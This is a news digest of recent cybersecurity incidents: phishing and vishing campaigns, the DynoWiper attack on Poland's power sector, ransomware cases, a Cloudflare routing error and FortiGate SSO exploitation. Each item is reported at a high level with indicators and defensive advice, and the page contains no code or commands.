All news in category “Incidents and Data Breaches”

🔒 Fortinet researchers detailed a multi-stage phishing campaign targeting Russian organizations that delivers the Amnesia RAT and Hakuna Matata ransomware. Attackers use business-themed decoy documents and malicious LNK files that fetch staged PowerShell loaders from GitHub while binary payloads are hosted on Dropbox. The chain abuses defendnot to disable Microsoft Defender, leverages Telegram bots for telemetry and exfiltration, and assembles payloads in memory to minimize disk artifacts. Targeted recipients include HR and payroll staff, enabling credential theft, surveillance, and destructive encryption.

⚠️ A new wiper malware named DynoWiper was used in an attempted disruptive attack on Poland's power sector on December 29–30, 2025, according to a report by ESET. The activity is attributed to the Russia-linked group Sandworm based on overlaps with prior wiper campaigns. Targeted systems included two CHP plants and a renewables management system, but officials report no evidence of successful disruption. Poland is accelerating safeguards and drafting stricter cybersecurity legislation for IT and OT risk management and incident response.

📞 ShinyHunters says it is behind a wave of voice-phishing campaigns that compromise single sign-on accounts at Okta, Microsoft Entra, and Google, enabling access to downstream SaaS platforms. Attackers call employees posing as IT, steer victims through dynamic phishing pages and capture multi-factor authentication in real time, then enumerate connected applications to harvest data. The group claims Salesforce as a primary target and has issued extortion demands using stolen information.

🔎 ESET Research attributes a coordinated late‑2025 cyberattack on Poland’s power grid to the Russia‑aligned APT group Sandworm, citing strong overlaps in malware and tactics. The analyzed destructive payload, named DynoWiper, is detected as Win32/KillFiles.NMO (SHA‑1: 4EC3C90846AF6B79EE1A5188EEFA3FD21F6D4CF6). Researchers state medium confidence in the attribution and report they are not aware of any confirmed operational disruption. The incident occurred on the tenth anniversary of Sandworm’s 2015 Ukrainian power outage.

🏧 South Carolina prosecutors said two Venezuelan nationals pleaded guilty to conspiracy and computer crimes after using malware to force ATMs to dispense cash across the southeastern United States. They targeted older ATM models, installing a Ploutus variant by connecting laptops, using external drives, or swapping hard drives to trigger unauthorized withdrawals. Both defendants were sentenced, ordered to pay restitution, and face deportation following their terms.

⚠️On January 22, 2026, an automated routing policy change caused Cloudflare to unintentionally advertise IPv6 routes from a Miami router for 25 minutes. The misconfiguration accepted internal IBGP routes and redistributed them to peers and transit providers, funneling non-Cloudflare traffic into Miami and causing congestion, elevated packet loss, and higher latency on backbone links. Firewall filters on the router discarded around 12 Gbps of ingress traffic for those non-downstream prefixes. Cloudflare paused automation, reverted the change, restored normal operation, and apologized to affected users, customers, and external networks.

🔒 The office and mobility centre of Verkehrsgesellschaft Main-Tauber (VGMT) are closed and offline after a confirmed cyberattack that encrypted the organisation’s servers and data. It is unclear whether sensitive information was stolen; investigations are ongoing with support from the Baden-Württemberg state cybersecurity agency, local police, district IT specialists and an external vendor. VGMT says public local transport remains unaffected while teams work to restore limited services under heightened security precautions.

🔒 Under Armour is investigating claims that an unauthorized third party obtained customer data after the Everest ransomware group allegedly added the brand as a victim and claimed to have taken 343GB of information. Reports on 18 January 2026 said roughly 72 million email addresses and other personal details were posted on a hacking forum, and the incident was listed by Have I Been Pwned on 21 January. Compromised data is reported to include names, dates of birth, genders, geographic locations, purchase history and possibly phone numbers and some employee contact information. Under Armour says there is no evidence UA.com, payment processing systems or customer passwords were affected, and the company is working with external cybersecurity experts to investigate.

🔒 Cybersecurity researchers describe a two-wave phishing campaign that uses fake Greenvelope invitations to harvest Microsoft Outlook, Yahoo! and AOL credentials, then leverages those stolen logins to register and deploy legitimate LogMeIn RMM tools. Attackers deliver a signed executable, GreenVelopeCard.exe, containing a JSON configuration that silently installs LogMeIn Resolve and connects to an attacker-controlled URL. The RMM is configured for persistent, elevated access and hidden scheduled tasks to ensure survival and ongoing remote control.

🔒 Microsoft warns of a multi-stage adversary-in-the-middle (AitM) phishing and BEC campaign targeting the energy sector. The attackers abused SharePoint file-sharing and legitimate trusted addresses (a living-off-trusted-sites, LOTS, technique) to deliver credential-harvesting links, then used stolen session cookies and inbox rules to persist and hide activity. Microsoft says simple password resets are insufficient; organizations must revoke sessions, remove malicious rules, and enforce phishing-resistant controls.

🔍 Florida-based Cyber Centaurs discovered that the INC ransomware group left behind Restic backup artifacts that exposed an S3-style cloud repository used to hold stolen files. By performing forensic, non-destructive enumeration with Restic semantics, investigators were able to locate and decrypt datasets belonging to 12 US firms. The team reported findings to law enforcement and highlighted practical remediation steps: audit backups, monitor for encrypted egress, and patch backup software promptly.

🔔 Okta warns of bespoke vishing phishing kits sold as a service that enable live adversary-in-the-middle attacks to steal Okta SSO credentials. These kits include a C2 panel that lets callers control the victim's authentication flow in real time and synchronize fraudulent MFA dialogs to bypass push-based protections. Okta urges adoption of phishing-resistant MFA such as Okta FastPass, FIDO2 security keys, or passkeys and recommends user education and vendor notifications.

🔒 Symantec and Carbon Black disclosed a new ransomware family called Osiris that targeted a major food service franchisee operator in Southeast Asia in November 2025. The attackers deployed a bespoke malicious driver named POORTRY in a BYOVD-style technique to disable security tooling and elevate privileges, and they exfiltrated data to Wasabi cloud buckets using Rclone before encryption. Osiris uses a hybrid per-file encryption scheme that generates unique keys per file, can stop services and terminate processes, and targets numerous backup and productivity services; defenders are advised to limit RDP exposure, monitor dual‑use tools, enforce MFA, adopt application allowlisting where feasible, and maintain off-site backups.

🔍 Cyber Centaurs conducted a forensic investigation after a client reported ransomware activity and found a RainINC variant executed from the PerfLogs directory. Analysts discovered artifacts tied to Restic — renamed binaries, PowerShell scripts (notably new.ps1 with Base64-encoded commands) and hardcoded S3 credentials — indicating long-lived attacker-controlled backup repositories. Using a controlled, non-destructive enumeration they recovered encrypted backups for 12 unrelated U.S. organizations across healthcare, manufacturing, technology, and services, preserved copies, and notified law enforcement. The team published findings, a list of tools observed in INC infrastructure, and YARA/Sigma rules to help defenders detect suspicious Restic usage and renamed binaries.

🔒 PcComponentes has denied claims by an online actor using the alias 'daghetiaw' that it stole personal data for 16.3 million people. Security platform Hackrisk.io reported the claim and a shared 500,000-line sample, while PcComponentes says there was no unauthorized access to its databases. The retailer attributes the activity to credential stuffing, stresses that raw payment card data were not stored, and says it has implemented measures to strengthen account protection.

🔒 Conceptnet reported a ransomware attack that encrypted central systems, including web and email servers, after perpetrators gained access around 13 January 2026. The incident was detected, isolated and reported to authorities, and external forensics teams are assisting with recovery. The provider—supporting roughly 500 customers—has set up temporary websites for affected clients, which include REWAG, Stadtwerk Regensburg and SSV Jahn Regensburg, while a possible ransom demand and reports of AI use in the attack are under consideration.

🔒 LastPass has warned users of an ongoing phishing campaign that began on January 19 and attempts to harvest master passwords by directing recipients to a fake LastPass login page. The fraudulent emails pressure users with a 24-hour "backup your vault" deadline to increase clicks. If credentials are entered, attackers can access the vault and any stored account logins. LastPass is working with partners to take down malicious domains and reiterated it will never request a master password.

🐞 Check Point Research is tracking an active phishing campaign by KONNI, a North Korea–linked actor that has shifted from geopolitical targets to software developers and engineering teams. The campaign specifically targets blockchain and cryptocurrency projects and uses lures crafted to resemble legitimate project documentation. Attackers deliver malicious attachments and payloads intended to compromise developer credentials and infrastructure, and the activity displays expanded geographic reach and sophisticated social-engineering techniques.

📧 Attackers abused Microsoft Teams functionality to distribute phishing content that appears to come from legitimate services. They created guest invitations and finance-themed team names that mimic billing and subscription notices, prompting recipients to contact a fraudulent support phone number. The campaign sent 12,866 phishing messages (about 990 per day) and targeted 6,135 users. Recipients were encouraged to call attackers posing as support to resolve fake payment issues.

🚨 Cybersecurity firm Arctic Wolf reports automated attacks against Fortinet FortiGate devices that exploit the FortiCloud SSO feature to create rogue admin accounts and rapidly export firewall configurations. The campaign began January 15 and mirrors December exploitation tied to CVE-2025-59718. Observed indicators include SSO logins from cloud-init@mail.io and IP 104.28.244.114. Administrators are advised to disable FortiCloud SSO until Fortinet issues a complete fix.